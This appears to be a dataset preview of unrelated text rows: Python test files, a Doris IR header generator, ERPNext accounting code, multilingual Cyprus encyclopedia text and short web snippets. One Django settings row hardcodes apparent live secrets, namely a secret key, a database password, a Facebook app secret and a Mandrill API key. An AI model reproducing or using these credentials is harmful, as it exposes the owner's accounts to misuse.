text
stringlengths 29
850k
|
---|
import json
from . import load_fixture
from contextlib import contextmanager
from github3.repos.repo import Repository
from github3.pulls import PullRequest
from lintreview.config import load_config
from lintreview.repo import GithubRepository
from lintreview.repo import GithubPullRequest
from mock import Mock, patch, sentinel
from nose.tools import eq_, ok_
from unittest import TestCase
config = load_config()
class TestGithubRepository(TestCase):
def setUp(self):
fixture = load_fixture('pull_request.json')
self.repo_model = Repository(json.loads(fixture))
@patch('lintreview.repo.github')
def test_repository(self, github_mock):
github_mock.get_repository.return_value = self.repo_model
repo = GithubRepository(config, 'markstory', 'lint-test')
eq_(self.repo_model, repo.repository())
github_mock.get_repository.assert_called_with(
config,
'markstory',
'lint-test')
def test_pull_request(self):
model = self.repo_model
model.pull_request = Mock(return_value=sentinel.pull_request)
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
pull = repo.pull_request(1)
ok_(isinstance(pull, GithubPullRequest),
'Should be wrapped object')
def test_ensure_label__missing(self):
model = self.repo_model
model.label = Mock(return_value=None)
model.create_label = Mock()
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
repo.ensure_label('A label')
model.create_label.assert_called_with(
name='A label',
color='bfe5bf')
def test_ensure_label__exists(self):
model = self.repo_model
model.create_label = Mock()
model.label = Mock(return_value=True)
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
repo.ensure_label('A label')
eq_(False, model.create_label.called)
def test_create_status(self):
model = self.repo_model
model.create_status = Mock()
repo = GithubRepository(config, 'markstory', 'lint-test')
repo.repository = lambda: self.repo_model
repo.create_status('abc123', 'succeeded', 'all good')
model.create_status.assert_called_with(
'abc123',
'succeeded',
None,
'all good',
'lintreview')
class TestGithubPullRequest(TestCase):
def setUp(self):
fixture = load_fixture('pull_request.json')
self.model = PullRequest(json.loads(fixture)['pull_request'])
def test_is_private(self):
pull = GithubPullRequest(self.model)
assert False is pull.is_private
def test_display_name(self):
pull = GithubPullRequest(self.model)
assert 'markstory/lint-test#1' == pull.display_name
def test_number(self):
pull = GithubPullRequest(self.model)
assert 1 == pull.number
def test_head(self):
pull = GithubPullRequest(self.model)
expected = '53cb70abadcb3237dcb2aa2b1f24dcf7bcc7d68e'
assert expected == pull.head
def test_clone_url(self):
pull = GithubPullRequest(self.model)
expected = 'https://github.com/contributor/lint-test.git'
assert expected == pull.clone_url
def test_base_repo_url(self):
pull = GithubPullRequest(self.model)
expected = 'https://github.com/markstory/lint-test.git'
assert expected == pull.base_repo_url
def test_target_branch(self):
pull = GithubPullRequest(self.model)
assert 'master' == pull.target_branch
def test_remove_label__label_exists(self):
pull = GithubPullRequest(self.model)
label_name = 'No lint errors'
with add_ok_label(pull, label_name):
pull.remove_label(label_name)
pull.pull.issue().remove_label.assert_called_with(label_name)
def test_remove_label__label_missing(self):
pull = GithubPullRequest(self.model)
label_name = 'No lint errors'
with add_ok_label(pull, 'Other label'):
pull.remove_label(label_name)
assert 0 == pull.pull.issue().remove_label.call_count
def test_add_label(self):
mock_issue = Mock()
self.model.issue = lambda: mock_issue
pull = GithubPullRequest(self.model)
pull.add_label('No lint errors')
mock_issue.add_labels.assert_called_with('No lint errors')
def test_create_comment(self):
self.model.create_comment = Mock()
pull = GithubPullRequest(self.model)
text = 'No lint errors found'
pull.create_comment(text)
self.model.create_comment.assert_called_with(text)
def test_create_review_comment(self):
self.model.create_review_comment = Mock()
pull = GithubPullRequest(self.model)
comment = {
'body': 'bad whitespace',
'commit_id': 'abc123',
'path': 'some/file.php',
'position': 12
}
pull.create_review_comment(**comment)
self.model.create_review_comment.assert_called_with(
comment['body'],
comment['commit_id'],
comment['path'],
comment['position'])
@contextmanager
def add_ok_label(pull_request, *labels, **kw):
if labels:
class Label(object):
def __init__(self, name):
self.name = name
mock_issue = Mock()
mock_issue.labels.return_value = [Label(n) for n in labels]
pull_request.pull.issue = lambda: mock_issue
yield
|
Η Κύπρος είναι νησί της ανατολικής Μεσογείου θάλασσας, το τρίτο σε μέγεθος, και βρίσκεται 100 περίπου χιλιόμετρα νότια της Τουρκίας και 120 χιλιόμετρα δυτικά της Συρίας. Γεωγραφικά η Κύπρος ανήκει στην νοτιοδυτική Ασία. Ωστόσο, επειδή ιστορικά, πολιτιστικά η Κύπρος ακολούθησε τη πορεία όλου του Ελληνισμού, μπορεί να θεωρείται μέρος της Δύσης και της Ευρώπης.
Kıbrıs Akdeniz'de bir adadır. Kuzeyinde 65 km mesafe ile Türkiye, doğusunda 112 km mesafe ile Suriye, 267 km ile İsrail, 162 km ile Lübnan; güneyinde 418 km ile Mısır; batısında ise 965 km ile Yunanistan yer almaktadır. Kıbrıs adası 30.33 ve 35.41 eylemleri ve 32.23 ve 34.55 boylamları arasındadır. KKTC'nin yüzölçümü 3.355 km²dir. Yaklaşık olarak ada sahillerinin yarısı KKTC sınırları içerisindedir.
The Republic of Cyprus is a Eurasian island nation in the eastern part of the Mediterranean Sea south of the Anatolian peninsula (Asia Minor). A Turkish invasion in 1974 led to the establishment of a separatist government to govern the invaded area, currently styling itself the Turkish Republic of ► Northern Cyprus, separated from the south by the UN-controlled Green Line and recognized only by Turkey. The Republic of Cyprus has been a member state of the European Union since 1 May 2004. The British possess ► Akrotiri and Dhekelia on the island. Cyprus lies south of ► Turkey, west of ► Syria and ► Lebanon and north of ► Egypt.
More images Cyprus - Cyprus (Category).
Location of Akrotiri and Dhekelia on Cyprus. See also Atlas of Akrotiri and Dhekelia.
Map of Northern Cyprus. See also Atlas of Northern Cyprus.
This section holds a short summary of the history of the area of present-day Cyprus, illustrated with maps, including historical maps of former countries and empires that included present-day Cyprus.
The Kingdom of Cyprus in 1265 (William R. Shepherd, Historical Atlas, 1911).
A former British colony, the Republic of Cyprus gained independence in 1960 while the United Kingdom retained two Sovereign Base Areas. Following 11 years of alternating intercommunal violence, leading to the sending of UN peacekeeping forces in 1964, and peaceful attempts at reconciliation in response to an Athens-engineered coup aimed at uniting the island with Greece, Turkey launched a two-stage invasion of the island in 1974. The invasion led to the internal displacement of thousands of Greek and Turkish Cypriots and the subsequent establishment of a separatist regime to govern the invaded area, currently styling itself the Turkish Republic of Northern Cyprus, separated from the south by the UN-controlled Green Line and recognized only by Turkey.
↑ Romanization according to ISO 843: Kýpros - Kypriakḗ Dēmokratía.
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This script will generate two headers that describe all of the clang cross compiled
functions.
The script outputs (run: 'doris/common/function-registry/gen_functions.py')
- be/src/generated-sources/doris-ir/doris-ir-functions.h
This file contains enums for all of the cross compiled functions
- be/src/generated-sources/doris-ir/doris-ir-function-names.h
This file contains a mapping of <string, enum>
Mapping of enum to compiled function name. The compiled function name only has to
be a substring of the actual, mangled compiler generated name.
TODO: should we work out the mangling rules?
"""
import string
import os
ir_functions = [
["AGG_NODE_PROCESS_ROW_BATCH_WITH_GROUPING", "process_row_batch_with_grouping"],
["AGG_NODE_PROCESS_ROW_BATCH_NO_GROUPING", "process_row_batch_no_grouping"],
# ["EXPR_GET_VALUE", "IrExprGetValue"],
# ["HASH_CRC", "IrCrcHash"],
# ["HASH_FVN", "IrFvnHash"],
["HASH_JOIN_PROCESS_BUILD_BATCH", "12HashJoinNode19process_build_batch"],
["HASH_JOIN_PROCESS_PROBE_BATCH", "12HashJoinNode19process_probe_batch"],
["EXPR_GET_BOOLEAN_VAL", "4Expr15get_boolean_val"],
["EXPR_GET_TINYINT_VAL", "4Expr16get_tiny_int_val"],
["EXPR_GET_SMALLINT_VAL", "4Expr17get_small_int_val"],
["EXPR_GET_INT_VAL", "4Expr11get_int_val"],
["EXPR_GET_BIGINT_VAL", "4Expr15get_big_int_val"],
["EXPR_GET_LARGEINT_VAL", "4Expr17get_large_int_val"],
["EXPR_GET_FLOAT_VAL", "4Expr13get_float_val"],
["EXPR_GET_DOUBLE_VAL", "4Expr14get_double_val"],
["EXPR_GET_STRING_VAL", "4Expr14get_string_val"],
["EXPR_GET_DATETIME_VAL", "4Expr16get_datetime_val"],
["EXPR_GET_DECIMAL_VAL", "4Expr15get_decimal_val"],
["HASH_CRC", "ir_crc_hash"],
["HASH_FNV", "ir_fnv_hash"],
["FROM_DECIMAL_VAL", "16from_decimal_val"],
["TO_DECIMAL_VAL", "14to_decimal_val"],
["FROM_DATETIME_VAL", "17from_datetime_val"],
["TO_DATETIME_VAL", "15to_datetime_val"],
["IR_STRING_COMPARE", "ir_string_compare"],
# ["STRING_VALUE_EQ", "StringValueEQ"],
# ["STRING_VALUE_NE", "StringValueNE"],
# ["STRING_VALUE_GE", "StringValueGE"],
# ["STRING_VALUE_GT", "StringValueGT"],
# ["STRING_VALUE_LT", "StringValueLT"],
# ["STRING_VALUE_LE", "StringValueLE"],
# ["STRING_TO_BOOL", "IrStringToBool"],
# ["STRING_TO_INT8", "IrStringToInt8"],
# ["STRING_TO_INT16", "IrStringToInt16"],
# ["STRING_TO_INT32", "IrStringToInt32"],
# ["STRING_TO_INT64", "IrStringToInt64"],
# ["STRING_TO_FLOAT", "IrStringToFloat"],
# ["STRING_TO_DOUBLE", "IrStringToDouble"],
# ["STRING_IS_NULL", "IrIsNullString"],
["HLL_UPDATE_BOOLEAN", "hll_updateIN8doris_udf10BooleanVal"],
["HLL_UPDATE_TINYINT", "hll_updateIN8doris_udf10TinyIntVal"],
["HLL_UPDATE_SMALLINT", "hll_updateIN8doris_udf11SmallIntVal"],
["HLL_UPDATE_INT", "hll_updateIN8doris_udf6IntVal"],
["HLL_UPDATE_BIGINT", "hll_updateIN8doris_udf9BigIntVal"],
["HLL_UPDATE_FLOAT", "hll_updateIN8doris_udf8FloatVal"],
["HLL_UPDATE_DOUBLE", "hll_updateIN8doris_udf9DoubleVal"],
["HLL_UPDATE_STRING", "hll_updateIN8doris_udf9StringVal"],
["HLL_UPDATE_TIMESTAMP", "hll_updateIN8doris_udf11DateTimeVal"],
["HLL_UPDATE_DECIMAL", "hll_updateIN8doris_udf10DecimalVal"],
["HLL_MERGE", "hll_merge"],
["CODEGEN_ANYVAL_DATETIME_VAL_EQ", "datetime_val_eq"],
["CODEGEN_ANYVAL_STRING_VAL_EQ", "string_val_eq"],
["CODEGEN_ANYVAL_DECIMAL_VAL_EQ", "decimal_val_eq"],
["CODEGEN_ANYVAL_DATETIME_VALUE_EQ", "datetime_value_eq"],
["CODEGEN_ANYVAL_STRING_VALUE_EQ", "string_value_eq"],
["CODEGEN_ANYVAL_DECIMAL_VALUE_EQ", "decimal_value_eq"],
["RAW_VALUE_COMPARE", "8RawValue7compare"],
]
enums_preamble = '\
// Licensed to the Apache Software Foundation (ASF) under one \n\
// or more contributor license agreements. See the NOTICE file \n\
// distributed with this work for additional information \n\
// regarding copyright ownership. The ASF licenses this file \n\
// to you under the Apache License, Version 2.0 (the \n\
// "License"); you may not use this file except in compliance \n\
// with the License. You may obtain a copy of the License at \n\
// \n\
// http://www.apache.org/licenses/LICENSE-2.0 \n\
// \n\
// Unless required by applicable law or agreed to in writing, \n\
// software distributed under the License is distributed on an \n\
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY \n\
// KIND, either express or implied. See the License for the \n\
// specific language governing permissions and limitations \n\
// under the License. \n\
\n\
// This is a generated file, DO NOT EDIT IT.\n\
// To add new functions, see be/src/codegen/gen_ir_descriptions.py.\n\
\n\
#ifndef DORIS_IR_FUNCTIONS_H\n\
#define DORIS_IR_FUNCTIONS_H\n\
\n\
namespace doris {\n\
\n\
class IRFunction {\n\
public:\n\
enum Type {\n'
enums_epilogue = '\
};\n\
};\n\
\n\
}\n\
\n\
#endif\n'
names_preamble = '\
// Licensed to the Apache Software Foundation (ASF) under one \n\
// or more contributor license agreements. See the NOTICE file \n\
// distributed with this work for additional information \n\
// regarding copyright ownership. The ASF licenses this file \n\
// to you under the Apache License, Version 2.0 (the \n\
// "License"); you may not use this file except in compliance \n\
// with the License. You may obtain a copy of the License at \n\
// \n\
// http://www.apache.org/licenses/LICENSE-2.0 \n\
// \n\
// Unless required by applicable law or agreed to in writing, \n\
// software distributed under the License is distributed on an \n\
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY \n\
// KIND, either express or implied. See the License for the \n\
// specific language governing permissions and limitations \n\
// under the License. \n\
\n\
// This is a generated file, DO NOT EDIT IT.\n\
// To add new functions, see be/src/codegen/gen_ir_descriptions.py.\n\
\n\
#ifndef DORIS_IR_FUNCTION_NAMES_H\n\
#define DORIS_IR_FUNCTION_NAMES_H\n\
\n\
#include "doris_ir/doris_ir_functions.h"\n\
\n\
namespace doris {\n\
\n\
static struct {\n\
std::string fn_name; \n\
IRFunction::Type fn; \n\
} FN_MAPPINGS[] = {\n'
names_epilogue = '\
};\n\
\n\
}\n\
\n\
#endif\n'
BE_PATH = os.environ['DORIS_HOME'] + "/gensrc/build/doris_ir/"
if not os.path.exists(BE_PATH):
os.makedirs(BE_PATH)
if __name__ == "__main__":
print "Generating IR description files"
enums_file = open(BE_PATH + 'doris_ir_functions.h', 'w')
enums_file.write(enums_preamble)
names_file = open(BE_PATH + 'doris_ir_names.h', 'w')
names_file.write(names_preamble)
idx = 0
enums_file.write(" FN_START = " + str(idx) + ",\n")
for fn in ir_functions:
enum = fn[0]
fn_name = fn[1]
enums_file.write(" " + enum + " = " + str(idx) + ",\n")
names_file.write(" { \"" + fn_name + "\", IRFunction::" + enum + " },\n")
idx = idx + 1
enums_file.write(" FN_END = " + str(idx) + "\n")
enums_file.write(enums_epilogue)
enums_file.close()
names_file.write(names_epilogue)
names_file.close()
|
Single Gemstone on a 16" silk cord. Simple and beautiful. Silk colors and gemstones can be customized.
|
# Copyright 2014 Google Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import caniusepypy as ciu
from caniusepypy.test import unittest
import tempfile
EXAMPLE_METADATA = """Metadata-Version: 1.2
Name: TestingMetadata
Version: 0.5
Summary: testing
Home-page: http://github.com/brettcannon/caniusepypy
Author: Brett Cannon
Author-email: [email protected]
License: Apache
Requires-Dist: Twisted
"""
class CheckTest(unittest.TestCase):
# When testing input, make sure to use project names that **will** lead to
# a False answer since unknown projects are skipped.
def test_success(self):
self.assertTrue(ciu.check(projects=['cryptography']))
def test_failure(self):
self.assertFalse(ciu.check(projects=['Twisted']))
def test_requirements(self):
with tempfile.NamedTemporaryFile('w') as file:
file.write('Twisted\n')
file.flush()
self.assertFalse(ciu.check(requirements_paths=[file.name]))
def test_metadata(self):
self.assertFalse(ciu.check(metadata=[EXAMPLE_METADATA]))
def test_projects(self):
# Implicitly done by test_success and test_failure.
pass
def test_case_insensitivity(self):
self.assertFalse(ciu.check(projects=['TwIsTeD']))
def test_ignore_missing_projects(self):
self.assertTrue(ciu.check(projects=['sdfsjdfsdlfk;jasdflkjasdfdsfsdf']))
|
The Worldwide Photography Gala Awards announces Winners of the 9th Julia Margaret Cameron Award for Women Photographers (JMCA). Documentary and Travel Photographer Marja Schwartz was awarded for her winning entry.
Description: Portrait of a baby from Maasai tribe on the back of his mother, Ngorongoro Crater, Tanzania, Africa.
Marja Schwartz was awarded in the 9th Julia Margaret Cameron Award for Women Photographers for the winning entry “Piggyback”.
531 women photographers from 50 countries have submitted from this edition. The juror Andréa Holzherr, Curator (Ecole du Louvre / Sorbonne) and Director of Global Exhibitions of Magnum Photos, has selected the awardees and is pleased to declare that Marja Schwartz was awarded Winner in Portraits / Single Image for the entry Piggyback.
The works of the winners will be exhibited at the Berlin Foto Biennale and 4th Biennial of Fine Art and Documentary Photography during the European Month of Photography in Berlin in October 2016. 446 contemporary artists from 41 countries are participating alongside Magnum photographer Steve McCurry.
|
# Copyright (C) 2010 Jeremy S. Sanders
# Email: Jeremy Sanders <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
from .field import *
from .datasetplugin import *
from .importplugin import *
from .toolsplugin import *
from .votable import *
# backward compatibility
ImportDataset1D = Dataset1D
ImportDataset2D = Dataset2D
ImportDatasetText = DatasetText
ImportField = Field
ImportFieldCheck = FieldBool
ImportFieldText = FieldText
ImportFieldFloat = FieldFloat
ImportFieldInt = FieldInt
ImportFieldCombo = FieldCombo
|
It was a great night catching up with some of our volunteers at Killen’s Burgers tonight, where a couple of the volunteers braved the 99 Burger! A portion of the purchase is donated to the JJWF.
“We get headlines, and we’re playing a game. These guys don’t get the headlines, but they’re the ones that save lives. Between them, and the police, and the military – I mean – those are people that are doing stuff that matters because they are true heroes…”- JJ Watt See JJ firefighter training here.
Did you miss SportsCenter’s “My Wish” segment featuring 9-year-old Will Martinez and JJ Watt? No need to worry! You can check out the inspiring segment here.
|
# -*- encoding: utf-8 -*-
"""
Django settings for dp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@+d%g-+1%))$q!un*qx6pv&vivpcz7yzmd7#3v)56#q&-5n*&@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'social.apps.django_app.default',
'django_extensions',
'rest_framework',
'rest_framework.authtoken',
'djrill',
'tournaments',
'games',
'notifications',
'contact',
'homepage',
)
MIDDLEWARE_CLASSES = (
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'dp.urls'
WSGI_APPLICATION = 'dp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
import dj_database_url
DATABASES = {
'default': dj_database_url.config(default='postgres://dp:DPfutbol1983%@localhost:5432/dp')
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'es-ar'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.FileSystemFinder',
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.request',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
)
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookAppOAuth2',
'social.backends.facebook.FacebookOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
#'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
)
}
CORS_ORIGIN_WHITELIST = (
'localhost:9090',
'localhost:3000',
'127.0.0.1:9000',
'dpfutbol.com',
'www.dpfutbol.com',
)
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'x-csrftoken',
'WWW-Authenticate',
)
SOCIAL_AUTH_FACEBOOK_KEY = '1480234775555747'
SOCIAL_AUTH_FACEBOOK_SECRET = 'ab0980264107f9856823e3650a1871da'
SOCIAL_AUTH_FACEBOOK_SCOPE = ['email']
AUTH_USER_MODEL = 'games.Player'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
# MANDRILL
MANDRILL_API_KEY = '4rbqFI0BJL8ryoHT7CRGLw'
EMAIL_BACKEND = "djrill.mail.backends.djrill.DjrillBackend"
# CELERY SETTINGS
BROKER_URL = 'redis://localhost:6379/0'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
GRAPPELLI_ADMIN_TITLE = u"DP Fútbol"
|
> You're using exec, once that line is reached, bash replaces itself with wmii.
> wmii || xmessage "Restart..."
> exit, it's all fine.
auto-pilot + your fingers acting with muscle memory).
Next message: Tom Kazimiers: "Re: [dev] [wmii] Prevent losing of windows on crash/hang"
Previous message: Connor Lane Smith: "Re: [dev] [dwm] Status color patch for dwm 5.8.2"
In reply to: Rob: "Re: [dev] [wmii] Prevent losing of windows on crash/hang"
Next in thread: Tom Kazimiers: "Re: [dev] [wmii] Prevent losing of windows on crash/hang"
Reply: Tom Kazimiers: "Re: [dev] [wmii] Prevent losing of windows on crash/hang"
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.utils import flt, getdate, nowdate, add_days
from erpnext.controllers.accounts_controller import AccountsController
from erpnext.accounts.general_ledger import make_gl_entries
class InvoiceDiscounting(AccountsController):
def validate(self):
self.validate_mandatory()
self.calculate_total_amount()
self.set_status()
self.set_end_date()
def set_end_date(self):
if self.loan_start_date and self.loan_period:
self.loan_end_date = add_days(self.loan_start_date, self.loan_period)
def validate_mandatory(self):
if self.docstatus == 1 and not (self.loan_start_date and self.loan_period):
frappe.throw(_("Loan Start Date and Loan Period are mandatory to save the Invoice Discounting"))
def calculate_total_amount(self):
self.total_amount = sum([flt(d.outstanding_amount) for d in self.invoices])
def on_submit(self):
self.make_gl_entries()
def on_cancel(self):
self.set_status()
self.make_gl_entries()
def set_status(self):
self.status = "Draft"
if self.docstatus == 1:
self.status = "Sanctioned"
elif self.docstatus == 2:
self.status = "Cancelled"
def make_gl_entries(self):
company_currency = frappe.get_cached_value('Company', self.company, "default_currency")
gl_entries = []
for d in self.invoices:
inv = frappe.db.get_value("Sales Invoice", d.sales_invoice,
["debit_to", "party_account_currency", "conversion_rate", "cost_center"], as_dict=1)
if d.outstanding_amount:
outstanding_in_company_currency = flt(d.outstanding_amount * inv.conversion_rate,
d.precision("outstanding_amount"))
ar_credit_account_currency = frappe.get_cached_value("Account", self.accounts_receivable_credit, "currency")
gl_entries.append(self.get_gl_dict({
"account": inv.debit_to,
"party_type": "Customer",
"party": d.customer,
"against": self.accounts_receivable_credit,
"credit": outstanding_in_company_currency,
"credit_in_account_currency": outstanding_in_company_currency \
if inv.party_account_currency==company_currency else d.outstanding_amount,
"cost_center": inv.cost_center,
"against_voucher": d.sales_invoice,
"against_voucher_type": "Sales Invoice"
}, inv.party_account_currency))
gl_entries.append(self.get_gl_dict({
"account": self.accounts_receivable_credit,
"party_type": "Customer",
"party": d.customer,
"against": inv.debit_to,
"debit": outstanding_in_company_currency,
"debit_in_account_currency": outstanding_in_company_currency \
if ar_credit_account_currency==company_currency else d.outstanding_amount,
"cost_center": inv.cost_center,
"against_voucher": d.sales_invoice,
"against_voucher_type": "Sales Invoice"
}, ar_credit_account_currency))
make_gl_entries(gl_entries, cancel=(self.docstatus == 2), update_outstanding='No')
def create_disbursement_entry(self):
je = frappe.new_doc("Journal Entry")
je.voucher_type = 'Journal Entry'
je.company = self.company
je.remark = 'Loan Disbursement entry against Invoice Discounting: ' + self.name
je.append("accounts", {
"account": self.bank_account,
"debit_in_account_currency": flt(self.total_amount) - flt(self.bank_charges),
})
je.append("accounts", {
"account": self.bank_charges_account,
"debit_in_account_currency": flt(self.bank_charges)
})
je.append("accounts", {
"account": self.short_term_loan,
"credit_in_account_currency": flt(self.total_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name
})
for d in self.invoices:
je.append("accounts", {
"account": self.accounts_receivable_discounted,
"debit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
je.append("accounts", {
"account": self.accounts_receivable_credit,
"credit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
return je
def close_loan(self):
je = frappe.new_doc("Journal Entry")
je.voucher_type = 'Journal Entry'
je.company = self.company
je.remark = 'Loan Settlement entry against Invoice Discounting: ' + self.name
je.append("accounts", {
"account": self.short_term_loan,
"debit_in_account_currency": flt(self.total_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
})
je.append("accounts", {
"account": self.bank_account,
"credit_in_account_currency": flt(self.total_amount)
})
if getdate(self.loan_end_date) > getdate(nowdate()):
for d in self.invoices:
je.append("accounts", {
"account": self.accounts_receivable_discounted,
"credit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
je.append("accounts", {
"account": self.accounts_receivable_unpaid,
"debit_in_account_currency": flt(d.outstanding_amount),
"reference_type": "Invoice Discounting",
"reference_name": self.name,
"party_type": "Customer",
"party": d.customer
})
return je
@frappe.whitelist()
def get_invoices(filters):
filters = frappe._dict(json.loads(filters))
cond = []
if filters.customer:
cond.append("customer=%(customer)s")
if filters.from_date:
cond.append("posting_date >= %(from_date)s")
if filters.to_date:
cond.append("posting_date <= %(to_date)s")
if filters.min_amount:
cond.append("base_grand_total >= %(min_amount)s")
if filters.max_amount:
cond.append("base_grand_total <= %(max_amount)s")
where_condition = ""
if cond:
where_condition += " and " + " and ".join(cond)
return frappe.db.sql("""
select
name as sales_invoice,
customer,
posting_date,
outstanding_amount
from `tabSales Invoice`
where
docstatus = 1
and outstanding_amount > 0
%s
""" % where_condition, filters, as_dict=1)
|
» On industrial scale, nitric acid is prepared by reacting?
On industrial scale, nitric acid is prepared by reacting?
Re: On industrial scale, nitric acid is prepared by reacting?
|
from modelmodel import behave
import numpy as np
SEED=45
def test_trials_trials():
prng = np.random.RandomState(SEED)
# Simplet trials is a trial: [1, ]
trials, prng = behave.trials.random(N=1, k=1, prng=prng)
assert np.allclose(trials, np.array([1,])), (
"simplest trials breaks")
# Does k work right?
trials, prng = behave.trials.random(N=1, k=10, prng=prng)
assert np.allclose(np.sum(trials), 10), "k is off"
# N?
trials, prng = behave.trials.random(N=2, k=1, prng=prng)
assert np.allclose(np.sum(trials), 3), "N is off"
# is L ok?
assert trials.shape[0] == 2, "l (N*k) is off"
def test_trials_jitter():
prng = np.random.RandomState(SEED)
# Jitter should not change N, k
trials, prng = behave.trials.random(2, 2, prng=prng)
trials, prng = behave.trials.jitter(trials, prng=prng)
assert np.allclose(np.sum(trials), 6), "N of k is off"
def test_probability_random():
prng = np.random.RandomState(SEED)
# Random ps should avg to 0.5
trials, prng = behave.trials.random(1, 1000, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.random(l, prng=prng)
assert np.allclose(np.mean(ps), .5, atol=.05), "Bad avg"
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
# Same avg for N > 1 conds
trials, prng = behave.trials.random(3, 1000, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.random(l, prng=prng)
assert np.allclose(np.mean(ps), .5, atol=.05), "Bad avg with 3 cond"
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
def test_probability_learn():
prng = np.random.RandomState(SEED)
# Vis
trials, prng = behave.trials.random(1, 20, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.learn(l, loc=3, prng=prng)
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
print(ps)
# ps should avg to more than 0.5
trials, prng = behave.trials.random(1, 1000, prng=prng)
l = trials.shape[0]
ps, prng = behave.probability.learn(l, loc=3, prng=prng)
assert np.mean(ps) > .5, "Bad avg"
# dim check
assert ps.shape[0] == trials.shape[0], "l off"
def test_acc_accuracy():
prng = np.random.RandomState(SEED)
# For lots of random ps acc should avg to 0.5
k = 5000
ps = np.asarray([0.5] * k)
